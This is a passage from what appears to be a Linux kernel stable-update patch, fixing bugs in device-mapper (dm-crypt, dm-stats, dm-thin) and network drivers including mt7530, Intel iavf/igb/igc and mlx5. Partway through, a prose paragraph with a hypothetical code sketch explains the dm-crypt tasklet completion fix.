+-	for (i = 0; i < qp->num_bcms; i++)
+-		qcom_icc_bcm_init(qp->bcms[i], &pdev->dev);
+-
+-	for (i = 0; i < num_nodes; i++) {
+-		size_t j;
+-
+-		if (!qnodes[i])
+-			continue;
+-
+-		node = icc_node_create(qnodes[i]->id);
+-		if (IS_ERR(node)) {
+-			ret = PTR_ERR(node);
+-			goto err;
+-		}
+-
+-		node->name = qnodes[i]->name;
+-		node->data = qnodes[i];
+-		icc_node_add(node, provider);
+-
+-		for (j = 0; j < qnodes[i]->num_links; j++)
+-			icc_link_create(node, qnodes[i]->links[j]);
+-
+-		data->nodes[i] = node;
+-	}
+-	data->num_nodes = num_nodes;
+-
+-	platform_set_drvdata(pdev, qp);
+-
+-	return 0;
+-err:
+-	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-	return ret;
+-}
+-
+-static int qnoc_remove(struct platform_device *pdev)
+-{
+-	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+-
+-	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id qnoc_of_match[] = {
+ 	{ .compatible = "qcom,sm8450-aggre1-noc",
+ 	  .data = &sm8450_aggre1_noc},
+@@ -1966,8 +1872,8 @@ static const struct of_device_id qnoc_of_match[] = {
+ MODULE_DEVICE_TABLE(of, qnoc_of_match);
+ 
+ static struct platform_driver qnoc_driver = {
+-	.probe = qnoc_probe,
+-	.remove = qnoc_remove,
++	.probe = qcom_icc_rpmh_probe,
++	.remove = qcom_icc_rpmh_remove,
+ 	.driver = {
+ 		.name = "qnoc-sm8450",
+ 		.of_match_table = qnoc_of_match,
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index 2653516bcdef5..dc2d0d61ade93 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -71,7 +71,9 @@ struct dm_crypt_io {
+ 	struct crypt_config *cc;
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+-	bool integrity_metadata_from_pool;
++	bool integrity_metadata_from_pool:1;
++	bool in_tasklet:1;
++
+ 	struct work_struct work;
+ 	struct tasklet_struct tasklet;
+ 
+@@ -1728,6 +1730,7 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
++	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1773,14 +1776,13 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 	 * our tasklet. In this case we need to delay bio_endio()
+ 	 * execution to after the tasklet is done and dequeued.
+ 	 */
+-	if (tasklet_trylock(&io->tasklet)) {
+-		tasklet_unlock(&io->tasklet);
+-		bio_endio(base_bio);
++	if (io->in_tasklet) {
++		INIT_WORK(&io->work, kcryptd_io_bio_endio);
++		queue_work(cc->io_queue, &io->work);
+ 		return;
+ 	}
+ 
+-	INIT_WORK(&io->work, kcryptd_io_bio_endio);
+-	queue_work(cc->io_queue, &io->work);
++	bio_endio(base_bio);
+ }
+ 
+ /*
+@@ -1933,6 +1935,7 @@ pop_from_list:
+ 			io = crypt_io_from_node(rb_first(&write_tree));
+ 			rb_erase(&io->rb_node, &write_tree);
+ 			kcryptd_io_write(io);
++			cond_resched();
+ 		} while (!RB_EMPTY_ROOT(&write_tree));
+ 		blk_finish_plug(&plug);
+ 	}
+@@ -2228,6 +2231,7 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * it is being executed with irqs disabled.
+ 		 */
+ 		if (in_hardirq() || irqs_disabled()) {
++			io->in_tasklet = true;
+ 			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+ 			tasklet_schedule(&io->tasklet);
+ 			return;
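
The old completion path probed tasklet_trylock() to guess whether it was running inside its own tasklet; recording the context in an explicit flag when the tasklet is scheduled is cheaper and cannot be confused by the lock being held for some other reason. The shape of the pattern, with hypothetical names throughout:

	#include <linux/workqueue.h>
	#include <linux/interrupt.h>
	#include <linux/bio.h>

	struct demo_io {
		struct bio *base_bio;
		struct work_struct work;
		struct tasklet_struct tasklet;
		bool in_tasklet;	/* set just before tasklet_schedule() */
	};

	static void demo_dec_pending(struct demo_io *io)
	{
		if (io->in_tasklet) {
			/* ending the bio frees io, and with it the tasklet that
			 * is still executing; bounce completion to process
			 * context so the tasklet can finish first */
			INIT_WORK(&io->work, demo_endio_work);	/* hypothetical fn */
			queue_work(demo_wq, &io->work);		/* hypothetical wq */
			return;
		}
		bio_endio(io->base_bio);	/* safe: not inside the tasklet */
	}
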
+diff --git a/drivers/md/dm-stats.c b/drivers/md/dm-stats.c
+index f105a71915ab6..d12ba9bce145d 100644
+--- a/drivers/md/dm-stats.c
++++ b/drivers/md/dm-stats.c
+@@ -188,7 +188,7 @@ static int dm_stat_in_flight(struct dm_stat_shared *shared)
+ 	       atomic_read(&shared->in_flight[WRITE]);
+ }
+ 
+-void dm_stats_init(struct dm_stats *stats)
++int dm_stats_init(struct dm_stats *stats)
+ {
+ 	int cpu;
+ 	struct dm_stats_last_position *last;
+@@ -197,11 +197,16 @@ void dm_stats_init(struct dm_stats *stats)
+ 	INIT_LIST_HEAD(&stats->list);
+ 	stats->precise_timestamps = false;
+ 	stats->last = alloc_percpu(struct dm_stats_last_position);
++	if (!stats->last)
++		return -ENOMEM;
++
+ 	for_each_possible_cpu(cpu) {
+ 		last = per_cpu_ptr(stats->last, cpu);
+ 		last->last_sector = (sector_t)ULLONG_MAX;
+ 		last->last_rw = UINT_MAX;
+ 	}
++
++	return 0;
+ }
+ 
+ void dm_stats_cleanup(struct dm_stats *stats)
+diff --git a/drivers/md/dm-stats.h b/drivers/md/dm-stats.h
+index 09c81a1ec057d..ee32b099f1cf7 100644
+--- a/drivers/md/dm-stats.h
++++ b/drivers/md/dm-stats.h
+@@ -21,7 +21,7 @@ struct dm_stats_aux {
+ 	unsigned long long duration_ns;
+ };
+ 
+-void dm_stats_init(struct dm_stats *st);
++int dm_stats_init(struct dm_stats *st);
+ void dm_stats_cleanup(struct dm_stats *st);
+ 
+ struct mapped_device;
+diff --git a/drivers/md/dm-thin.c b/drivers/md/dm-thin.c
+index e4c1a8a21bbd0..e6e5ab29a95df 100644
+--- a/drivers/md/dm-thin.c
++++ b/drivers/md/dm-thin.c
+@@ -3357,6 +3357,7 @@ static int pool_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 	pt->low_water_blocks = low_water_blocks;
+ 	pt->adjusted_pf = pt->requested_pf = pf;
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 
+ 	/*
+ 	 * Only need to enable discards if the pool should pass
+@@ -4235,6 +4236,7 @@ static int thin_ctr(struct dm_target *ti, unsigned argc, char **argv)
+ 		goto bad;
+ 
+ 	ti->num_flush_bios = 1;
++	ti->limit_swap_bios = true;
+ 	ti->flush_supported = true;
+ 	ti->accounts_remapped_io = true;
+ 	ti->per_io_data_size = sizeof(struct dm_thin_endio_hook);
+diff --git a/drivers/md/dm.c b/drivers/md/dm.c
+index fdcf42554e2a9..fc953013ea260 100644
+--- a/drivers/md/dm.c
++++ b/drivers/md/dm.c
+@@ -2092,7 +2092,9 @@ static struct mapped_device *alloc_dev(int minor)
+ 	if (!md->pending_io)
+ 		goto bad;
+ 
+-	dm_stats_init(&md->stats);
++	r = dm_stats_init(&md->stats);
++	if (r < 0)
++		goto bad;
+ 
+ 	/* Populate the mapping, nobody knows we exist yet */
+ 	spin_lock(&_minor_lock);
+diff --git a/drivers/net/dsa/b53/b53_mmap.c b/drivers/net/dsa/b53/b53_mmap.c
+index e968322dfbf0b..70887e0aece33 100644
+--- a/drivers/net/dsa/b53/b53_mmap.c
++++ b/drivers/net/dsa/b53/b53_mmap.c
+@@ -263,7 +263,7 @@ static int b53_mmap_probe_of(struct platform_device *pdev,
+ 		if (of_property_read_u32(of_port, "reg", &reg))
+ 			continue;
+ 
+-		if (reg < B53_CPU_PORT)
++		if (reg < B53_N_PORTS)
+ 			pdata->enabled_ports |= BIT(reg);
+ 	}
+ 
+diff --git a/drivers/net/dsa/mt7530.c b/drivers/net/dsa/mt7530.c
+index 178e5a3441e68..326f992536a7e 100644
+--- a/drivers/net/dsa/mt7530.c
++++ b/drivers/net/dsa/mt7530.c
+@@ -396,6 +396,9 @@ mt7530_fdb_write(struct mt7530_priv *priv, u16 vid,
+ /* Set up switch core clock for MT7530 */
+ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ {
++	/* Disable core clock */
++	core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
++
+ 	/* Disable PLL */
+ 	core_write(priv, CORE_GSWPLL_GRP1, 0);
+ 
+@@ -409,14 +412,19 @@ static void mt7530_pll_setup(struct mt7530_priv *priv)
+ 		   RG_GSWPLL_EN_PRE |
+ 		   RG_GSWPLL_POSDIV_200M(2) |
+ 		   RG_GSWPLL_FBKDIV_200M(32));
++
++	udelay(20);
++
++	/* Enable core clock */
++	core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_GSWCK_EN);
+ }
+ 
+-/* Setup TX circuit including relevant PAD and driving */
++/* Setup port 6 interface mode and TRGMII TX circuit */
+ static int
+ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ {
+ 	struct mt7530_priv *priv = ds->priv;
+-	u32 ncpo1, ssc_delta, trgint, i, xtal;
++	u32 ncpo1, ssc_delta, trgint, xtal;
+ 
+ 	xtal = mt7530_read(priv, MT7530_MHWTRAP) & HWTRAP_XTAL_MASK;
+ 
+@@ -433,6 +441,10 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		break;
+ 	case PHY_INTERFACE_MODE_TRGMII:
+ 		trgint = 1;
++		if (xtal == HWTRAP_XTAL_25MHZ)
++			ssc_delta = 0x57;
++		else
++			ssc_delta = 0x87;
+ 		if (priv->id == ID_MT7621) {
+ 			/* PLL frequency: 150MHz: 1.2GBit */
+ 			if (xtal == HWTRAP_XTAL_40MHZ)
+@@ -452,23 +464,12 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (xtal == HWTRAP_XTAL_25MHZ)
+-		ssc_delta = 0x57;
+-	else
+-		ssc_delta = 0x87;
+-
+ 	mt7530_rmw(priv, MT7530_P6ECR, P6_INTF_MODE_MASK,
+ 		   P6_INTF_MODE(trgint));
+ 
+ 	if (trgint) {
+-		/* Lower Tx Driving for TRGMII path */
+-		for (i = 0 ; i < NUM_TRGMII_CTRL ; i++)
+-			mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
+-				     TD_DM_DRVP(8) | TD_DM_DRVN(8));
+-
+-		/* Disable MT7530 core and TRGMII Tx clocks */
+-		core_clear(priv, CORE_TRGMII_GSW_CLK_CG,
+-			   REG_GSWCK_EN | REG_TRGMIICK_EN);
++		/* Disable the MT7530 TRGMII clocks */
++		core_clear(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 
+ 		/* Setup the MT7530 TRGMII Tx Clock */
+ 		core_write(priv, CORE_PLL_GROUP5, RG_LCDDS_PCW_NCPO1(ncpo1));
+@@ -485,13 +486,8 @@ mt7530_pad_clk_setup(struct dsa_switch *ds, phy_interface_t interface)
+ 			   RG_LCDDS_PCW_NCPO_CHG | RG_LCCDS_C(3) |
+ 			   RG_LCDDS_PWDB | RG_LCDDS_ISO_EN);
+ 
+-		/* Enable MT7530 core and TRGMII Tx clocks */
+-		core_set(priv, CORE_TRGMII_GSW_CLK_CG,
+-			 REG_GSWCK_EN | REG_TRGMIICK_EN);
+-	} else {
+-		for (i = 0 ; i < NUM_TRGMII_CTRL; i++)
+-			mt7530_rmw(priv, MT7530_TRGMII_RD(i),
+-				   RD_TAP_MASK, RD_TAP(16));
++		/* Enable the MT7530 TRGMII clocks */
++		core_set(priv, CORE_TRGMII_GSW_CLK_CG, REG_TRGMIICK_EN);
+ 	}
+ 
+ 	return 0;
+@@ -2206,6 +2202,15 @@ mt7530_setup(struct dsa_switch *ds)
+ 
+ 	mt7530_pll_setup(priv);
+ 
++	/* Lower Tx driving for TRGMII path */
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_write(priv, MT7530_TRGMII_TD_ODT(i),
++			     TD_DM_DRVP(8) | TD_DM_DRVN(8));
++
++	for (i = 0; i < NUM_TRGMII_CTRL; i++)
++		mt7530_rmw(priv, MT7530_TRGMII_RD(i),
++			   RD_TAP_MASK, RD_TAP(16));
++
+ 	/* Enable port 6 */
+ 	val = mt7530_read(priv, MT7530_MHWTRAP);
+ 	val &= ~MHWTRAP_P6_DIS & ~MHWTRAP_PHY_ACCESS;
+diff --git a/drivers/net/ethernet/google/gve/gve_ethtool.c b/drivers/net/ethernet/google/gve/gve_ethtool.c
+index ce574d097e280..5f81470843b49 100644
+--- a/drivers/net/ethernet/google/gve/gve_ethtool.c
++++ b/drivers/net/ethernet/google/gve/gve_ethtool.c
+@@ -537,7 +537,10 @@ static int gve_get_link_ksettings(struct net_device *netdev,
+ 				  struct ethtool_link_ksettings *cmd)
+ {
+ 	struct gve_priv *priv = netdev_priv(netdev);
+-	int err = gve_adminq_report_link_speed(priv);
++	int err = 0;
++
++	if (priv->link_speed == 0)
++		err = gve_adminq_report_link_speed(priv);
+ 
+ 	cmd->base.speed = priv->link_speed;
+ 	return err;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_txrx.c b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+index 924f972b91faf..72b091f2509d8 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_txrx.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_txrx.c
+@@ -171,10 +171,10 @@ static char *i40e_create_dummy_packet(u8 *dummy_packet, bool ipv4, u8 l4proto,
+ 				      struct i40e_fdir_filter *data)
+ {
+ 	bool is_vlan = !!data->vlan_tag;
+-	struct vlan_hdr vlan;
+-	struct ipv6hdr ipv6;
+-	struct ethhdr eth;
+-	struct iphdr ip;
++	struct vlan_hdr vlan = {};
++	struct ipv6hdr ipv6 = {};
++	struct ethhdr eth = {};
++	struct iphdr ip = {};
+ 	u8 *tmp;
+ 
+ 	if (ipv4) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_common.c b/drivers/net/ethernet/intel/iavf/iavf_common.c
+index 34e46a23894f4..43148c07459f8 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_common.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_common.c
+@@ -661,7 +661,7 @@ struct iavf_rx_ptype_decoded iavf_ptype_lookup[BIT(8)] = {
+ 	/* Non Tunneled IPv6 */
+ 	IAVF_PTT(88, IP, IPV6, FRG, NONE, NONE, NOF, NONE, PAY3),
+ 	IAVF_PTT(89, IP, IPV6, NOF, NONE, NONE, NOF, NONE, PAY3),
+-	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY3),
++	IAVF_PTT(90, IP, IPV6, NOF, NONE, NONE, NOF, UDP,  PAY4),
+ 	IAVF_PTT_UNUSED_ENTRY(91),
+ 	IAVF_PTT(92, IP, IPV6, NOF, NONE, NONE, NOF, TCP,  PAY4),
+ 	IAVF_PTT(93, IP, IPV6, NOF, NONE, NONE, NOF, SCTP, PAY4),
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index 4b09785d2147a..8bbdf66c51f6a 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -893,6 +893,10 @@ static int iavf_vlan_rx_add_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* Do not track VLAN 0 filter, always added by the PF on VF init */
++	if (!vid)
++		return 0;
++
+ 	if (!VLAN_FILTERING_ALLOWED(adapter))
+ 		return -EIO;
+ 
+@@ -919,6 +923,10 @@ static int iavf_vlan_rx_kill_vid(struct net_device *netdev,
+ {
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 
++	/* We do not track VLAN 0 filter */
++	if (!vid)
++		return 0;
++
+ 	iavf_del_vlan(adapter, IAVF_VLAN(vid, be16_to_cpu(proto)));
+ 	if (proto == cpu_to_be16(ETH_P_8021Q))
+ 		clear_bit(vid, adapter->vsi.active_cvlans);
+@@ -5069,6 +5077,11 @@ static void iavf_remove(struct pci_dev *pdev)
+ 			mutex_unlock(&adapter->crit_lock);
+ 			break;
+ 		}
++		/* Simply return if we already went through iavf_shutdown */
++		if (adapter->state == __IAVF_REMOVE) {
++			mutex_unlock(&adapter->crit_lock);
++			return;
++		}
+ 
+ 		mutex_unlock(&adapter->crit_lock);
+ 		usleep_range(500, 1000);
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_txrx.c b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+index 18b6a702a1d6d..e989feda133c1 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_txrx.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_txrx.c
+@@ -1096,7 +1096,7 @@ static inline void iavf_rx_hash(struct iavf_ring *ring,
+ 		cpu_to_le64((u64)IAVF_RX_DESC_FLTSTAT_RSS_HASH <<
+ 			    IAVF_RX_DESC_STATUS_FLTSTAT_SHIFT);
+ 
+-	if (ring->netdev->features & NETIF_F_RXHASH)
++	if (!(ring->netdev->features & NETIF_F_RXHASH))
+ 		return;
+ 
+ 	if ((rx_desc->wb.qword1.status_error_len & rss_mask) == rss_mask) {
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+index 365ca0c710c4a..0fea6b9b599fb 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_virtchnl.c
+@@ -2446,8 +2446,6 @@ void iavf_virtchnl_completion(struct iavf_adapter *adapter,
+ 		list_for_each_entry(f, &adapter->vlan_filter_list, list) {
+ 			if (f->is_new_vlan) {
+ 				f->is_new_vlan = false;
+-				if (!f->vlan.vid)
+-					continue;
+ 				if (f->vlan.tpid == ETH_P_8021Q)
+ 					set_bit(f->vlan.vid,
+ 						adapter->vsi.active_cvlans);
+diff --git a/drivers/net/ethernet/intel/ice/ice_sriov.c b/drivers/net/ethernet/intel/ice/ice_sriov.c
+index 3ba1408c56a9a..b3849bc3d4fc6 100644
+--- a/drivers/net/ethernet/intel/ice/ice_sriov.c
++++ b/drivers/net/ethernet/intel/ice/ice_sriov.c
+@@ -1384,15 +1384,15 @@ int ice_set_vf_trust(struct net_device *netdev, int vf_id, bool trusted)
+ 	struct ice_vf *vf;
+ 	int ret;
+ 
++	vf = ice_get_vf_by_id(pf, vf_id);
++	if (!vf)
++		return -EINVAL;
++
+ 	if (ice_is_eswitch_mode_switchdev(pf)) {
+ 		dev_info(ice_pf_to_dev(pf), "Trusted VF is forbidden in switchdev mode\n");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
+-	vf = ice_get_vf_by_id(pf, vf_id);
+-	if (!vf)
+-		return -EINVAL;
+-
+ 	ret = ice_check_vf_ready_for_cfg(vf);
+ 	if (ret)
+ 		goto out_put_vf;
+diff --git a/drivers/net/ethernet/intel/igb/igb_main.c b/drivers/net/ethernet/intel/igb/igb_main.c
+index b5b443883da98..c42584680e56a 100644
+--- a/drivers/net/ethernet/intel/igb/igb_main.c
++++ b/drivers/net/ethernet/intel/igb/igb_main.c
+@@ -3841,9 +3841,7 @@ static void igb_remove(struct pci_dev *pdev)
+ 	igb_release_hw_control(adapter);
+ 
+ #ifdef CONFIG_PCI_IOV
+-	rtnl_lock();
+ 	igb_disable_sriov(pdev);
+-	rtnl_unlock();
+ #endif
+ 
+ 	unregister_netdev(netdev);
+diff --git a/drivers/net/ethernet/intel/igbvf/netdev.c b/drivers/net/ethernet/intel/igbvf/netdev.c
+index 3a32809510fc6..72cb1b56e9f24 100644
+--- a/drivers/net/ethernet/intel/igbvf/netdev.c
++++ b/drivers/net/ethernet/intel/igbvf/netdev.c
+@@ -1074,7 +1074,7 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 			  igbvf_intr_msix_rx, 0, adapter->rx_ring->name,
+ 			  netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_tx;
+ 
+ 	adapter->rx_ring->itr_register = E1000_EITR(vector);
+ 	adapter->rx_ring->itr_val = adapter->current_itr;
+@@ -1083,10 +1083,14 @@ static int igbvf_request_msix(struct igbvf_adapter *adapter)
+ 	err = request_irq(adapter->msix_entries[vector].vector,
+ 			  igbvf_msix_other, 0, netdev->name, netdev);
+ 	if (err)
+-		goto out;
++		goto free_irq_rx;
+ 
+ 	igbvf_configure_msix(adapter);
+ 	return 0;
++free_irq_rx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
++free_irq_tx:
++	free_irq(adapter->msix_entries[--vector].vector, netdev);
+ out:
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/intel/igbvf/vf.c b/drivers/net/ethernet/intel/igbvf/vf.c
+index b8ba3f94c3632..a47a2e3e548cf 100644
+--- a/drivers/net/ethernet/intel/igbvf/vf.c
++++ b/drivers/net/ethernet/intel/igbvf/vf.c
+@@ -1,6 +1,8 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /* Copyright(c) 2009 - 2018 Intel Corporation. */
+ 
++#include <linux/etherdevice.h>
++
+ #include "vf.h"
+ 
+ static s32 e1000_check_for_link_vf(struct e1000_hw *hw);
+@@ -131,11 +133,16 @@ static s32 e1000_reset_hw_vf(struct e1000_hw *hw)
+ 		/* set our "perm_addr" based on info provided by PF */
+ 		ret_val = mbx->ops.read_posted(hw, msgbuf, 3);
+ 		if (!ret_val) {
+-			if (msgbuf[0] == (E1000_VF_RESET |
+-					  E1000_VT_MSGTYPE_ACK))
++			switch (msgbuf[0]) {
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_ACK:
+ 				memcpy(hw->mac.perm_addr, addr, ETH_ALEN);
+-			else
++				break;
++			case E1000_VF_RESET | E1000_VT_MSGTYPE_NACK:
++				eth_zero_addr(hw->mac.perm_addr);
++				break;
++			default:
+ 				ret_val = -E1000_ERR_MAC_INIT;
++			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 1dd2a7fee8d46..bcd62b36fd7a7 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -6007,18 +6007,18 @@ static bool validate_schedule(struct igc_adapter *adapter,
+ 		if (e->command != TC_TAPRIO_CMD_SET_GATES)
+ 			return false;
+ 
+-		for (i = 0; i < adapter->num_tx_queues; i++) {
+-			if (e->gate_mask & BIT(i))
++		for (i = 0; i < adapter->num_tx_queues; i++)
++			if (e->gate_mask & BIT(i)) {
+ 				queue_uses[i]++;
+ 
+-			/* There are limitations: A single queue cannot be
+-			 * opened and closed multiple times per cycle unless the
+-			 * gate stays open. Check for it.
+-			 */
+-			if (queue_uses[i] > 1 &&
+-			    !(prev->gate_mask & BIT(i)))
+-				return false;
+-		}
++				/* There are limitations: A single queue cannot
++				 * be opened and closed multiple times per cycle
++				 * unless the gate stays open. Check for it.
++				 */
++				if (queue_uses[i] > 1 &&
++				    !(prev->gate_mask & BIT(i)))
++					return false;
++			}
+ 	}
+ 
+ 	return true;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 7f8ffbf79cf74..ab126f8706c74 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -709,6 +709,7 @@ err_unreg_netdev:
+ err_ptp_destroy:
+ 	otx2_ptp_destroy(vf);
+ err_detach_rsrc:
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2_detach_resources(&vf->mbox);
+@@ -762,6 +763,7 @@ static void otx2vf_remove(struct pci_dev *pdev)
+ 	otx2_shutdown_tc(vf);
+ 	otx2vf_disable_mbox_intr(vf);
+ 	otx2_detach_resources(&vf->mbox);
++	free_percpu(vf->hw.lmt_info);
+ 	if (test_bit(CN10K_LMTST, &vf->hw.cap_flag))
+ 		qmem_free(vf->dev, vf->dync_lmt);
+ 	otx2vf_vfaf_mbox_destroy(vf);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index f84f1cfcddb85..25202ceaa7d2f 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1412,6 +1412,7 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	struct mlx5e_macsec_aso *aso;
+ 	struct mlx5_aso_wqe *aso_wqe;
+ 	struct mlx5_aso *maso;
++	unsigned long expires;
+ 	int err;
+ 
+ 	aso = &macsec->aso;
+@@ -1425,7 +1426,13 @@ static int macsec_aso_query(struct mlx5_core_dev *mdev, struct mlx5e_macsec *mac
+ 	macsec_aso_build_wqe_ctrl_seg(aso, &aso_wqe->aso_ctrl, NULL);
+ 
+ 	mlx5_aso_post_wqe(maso, false, &aso_wqe->ctrl);
+-	err = mlx5_aso_poll_cq(maso, false);
++	expires = jiffies + msecs_to_jiffies(10);
++	do {
++		err = mlx5_aso_poll_cq(maso, false);
++		if (err)
++			usleep_range(2, 10);
++	} while (err && time_is_after_jiffies(expires));
++
+ 	if (err)
+ 		goto err_out;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+index 2449731b7d79a..89de92d064836 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_dcbnl.c
+@@ -117,12 +117,14 @@ static int mlx5e_dcbnl_ieee_getets(struct net_device *netdev,
+ 	if (!MLX5_CAP_GEN(priv->mdev, ets))
+ 		return -EOPNOTSUPP;
+ 
+-	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
+-	for (i = 0; i < ets->ets_cap; i++) {
++	for (i = 0; i < IEEE_8021QAZ_MAX_TCS; i++) {
+ 		err = mlx5_query_port_prio_tc(mdev, i, &ets->prio_tc[i]);
+ 		if (err)
+ 			return err;
++	}
+ 
++	ets->ets_cap = mlx5_max_tc(priv->mdev) + 1;
++	for (i = 0; i < ets->ets_cap; i++) {
+ 		err = mlx5_query_port_tc_group(mdev, i, &tc_group[i]);
+ 		if (err)
+ 			return err;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index d6bcbc17151d7..47d4b54d15634 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -4094,8 +4094,12 @@ static netdev_features_t mlx5e_fix_features(struct net_device *netdev,
+ 		}
+ 	}
+ 
+-	if (mlx5e_is_uplink_rep(priv))
++	if (mlx5e_is_uplink_rep(priv)) {
+ 		features = mlx5e_fix_uplink_rep_features(netdev, features);
++		features |= NETIF_F_NETNS_LOCAL;
++	} else {
++		features &= ~NETIF_F_NETNS_LOCAL;
++	}
+ 
+ 	mutex_unlock(&priv->state_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+index a994e71e05c11..db578a7e7008a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/acl/ingress_ofld.c
+@@ -364,8 +364,7 @@ int mlx5_esw_acl_ingress_vport_bond_update(struct mlx5_eswitch *esw, u16 vport_n
+ 
+ 	if (WARN_ON_ONCE(IS_ERR(vport))) {
+ 		esw_warn(esw->dev, "vport(%d) invalid!\n", vport_num);
+-		err = PTR_ERR(vport);
+-		goto out;
++		return PTR_ERR(vport);
+ 	}
+ 
+ 	esw_acl_ingress_ofld_rules_destroy(esw, vport);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+index 9daf55e90367b..c8b978014f2c0 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch.c
+@@ -959,6 +959,7 @@ void mlx5_esw_vport_disable(struct mlx5_eswitch *esw, u16 vport_num)
+ 	 */
+ 	esw_vport_change_handle_locked(vport);
+ 	vport->enabled_events = 0;
++	esw_apply_vport_rx_mode(esw, vport, false, false);
+ 	esw_vport_cleanup(esw, vport);
+ 	esw->enabled_vports--;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 3992bf6337ca0..0facc709f0e74 100644
